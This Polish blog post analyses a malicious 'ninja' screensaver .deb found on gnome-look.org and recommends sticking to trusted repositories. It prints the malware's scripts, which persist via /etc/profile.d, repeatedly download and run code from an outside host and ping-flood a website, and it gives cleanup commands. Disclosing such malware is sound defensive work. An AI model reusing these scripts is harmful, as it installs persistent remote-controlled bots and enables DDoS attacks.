Home  >  linuksowo / ubuntu

Przyganiał kocioł

Na Linuksa nie ma wirusów – tak odpowie niemal każdy zaznajomiony ze specyfiką tego systemu. I o ile w przypadku samorozprzestrzeniających się wirusów jest to niemal prawda, o tyle nie mówi się głośno o problemie złośliwego oprogramowania (malware), które może narobić np. bigosu z plikami użytkownika. Mit niezłomnego systemu chyli się w mroczną przepaść?

A jest wyjątkowa okoliczność by wspomnieć o tym, bowiem parę godzin temu znaleziono na stronie http://gnome-look.org dwie paczki ze złośliwym kodem. Jedna z rzeczonych paczek .deb została umieszczona w kategorii ‘wygaszacze ekranu’ (pod nazwą ‘ninja’) i każdy kto ją zainstalował nowego wygaszacza na pewno nie zobaczył. A co zobaczył? Wynik uruchomienia takiego ‘instalatora’:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo —————–
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo —————–
clear
exit

Nie da się ukryć, że ten skrypt nie wygląda normalnie. Całość jest wykonywana przy każdym zalogowaniu przez umieszczony w /etc/profile.d/ plik gnome.sh (zawiera komendę /usr/bin/Auto.bash&). Na szczęście, całość wykonuje tylko prosty atak DDOS (?). Zawartość pliku Auto.bash:

while :
do
rm /usr/bin/run.bash
cd /usr/bin/
wget http://05748.t35.com/Bots/index.php
wget http://05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash
done

Skrypt run.bash wykonuje:

ping -s 65507 www.mmowned.com

Prawdopodobnie celem jest zebranie adresów IP komputerów z zainstalowanymi powyżej skryptami lub zDDOSowania mmowned.com (?).

Enigmatyczny plik index.php też nie wyjaśnia swojej roli w całym tym przedsięwzięciu – nie wklejam go, bo to zlepek skryptów.

<!-- T35 Hosting Ad Code Begin --> 
<style type="text/css"> 
#t35ad{font: 14px  arial,helvetica; text-decoration: none; line-height:1.5em; text-align: center; }
#t35ad a{font: 14px  arial,helvetica; text-decoration: none; }
#t35ad a:hover{background-color: black; color: white; font-size:medium; font-weight: bold; }
#t35ad ul{display: inline; list-style-type: none; padding: 0;}
#navlist li{display: inline; list-style-type: none; padding-right: 0px; padding-left: 0px; padding: 0;}
</style> 
<script type="text/javascript" charset="utf-8"> 
  var redvase_ad = { version: 1.5 };
  redvase_ad.publisher = 't35';
  redvase_ad.kind      = 't35_footer_prem';
  redvase_ad.content   = 'creative'
  </script> 
<script src="http://redvase.bravenet.com/javascripts/redvase.js" type="text/javascript" charset="utf-8"></script> 
<!-- T35 Hosting Ad Code End --> 
</noscript></noframes> 
<!-- T35 Hosting Ad Code Begin --> 
<!-- Start of Stat Code --> 
<img src="http://c11.statcounter.com/1120767/0/78e6f3a5/1/" width="1" height="1" alt="stats" /> 
<script type="text/javascript"> 
_qoptions={
qacct:"p-f2Rp-GHnsAESA"
};
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> 
<noscript><img src="http://pixel.quantserve.com/pixel/p-f2Rp-GHnsAESA.gif" height="1" width="1" alt="Quantcast"/></noscript> 
<!-- End of Stat Code --> 
<div id="t35ad" align="center"> 
<br/>Hosted by <a href="http://www.t35.com/">T35 Free Web Hosting</a>.
<a target=_blank href=http://www.saharamakeup.co.uk/>Indian Bridal Makeup</a> - <a target=_blank href=http://www.hypercasinos.com/component/option,com_jreviews/Itemid,28/>Casino Reviews</a> - <a target=_blank href=http://www.www.mckennavw.com/>VW Los Angeles</a> - <a href="http://www.drugrehabcenter.com/">Drug Rehab</a> - <a target=_blank href=http://www.bestonlinecollegesdegrees.com/college-degrees-online.html>Online Degree</a> - <a target=_blank href=http://www.uk-cheapest.co.uk>Domains</a> - <a target=_blank href=http://www.fashiondrops.com/>Prada Shoes</a> - <a target=_blank href=http://www.thelabdesign.com/organic-seo.html>SEO Los Angeles</a> 
</div>

Jeżeli ktoś zainstalował tę paczkę, pozostaje mu wykonać operację na żywym organizmie:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

Jaki morał wynika z tej historii? Ano taki, że przyganiał kocioł garnkowi. Wraz ze wzrostem uproszczeń w systemie Linux, staje się on podobnym celem dla złoczyńców, co i Windows. Czynnikiem decydującym pozostaje człowiek, który w imię wygody nie będzie zastanawiał się, po co jest potrzebne hasło administratora, ani też z jakiego źródła pochodzi paczka. Może nie będziemy świadkami takiego pogromu, jak w systemie Windows. Ale co z tego, że unikniemy rozprzestrzeniających się wirusów, jeśli jakiś drań za pomocą skryptów, które sami ochoczo zainstalujemy, usunie nam z dysku wszystkie pliki należące do nas? (każdy w miarę znający Bash’a jest w stanie to napisać).

Dlatego proponuję trzymać się sprawdzonych źródeł oprogramowania (oficjalne repozytoria lub repozytoria dodatkowe o sprawdzonej renomie, PPA).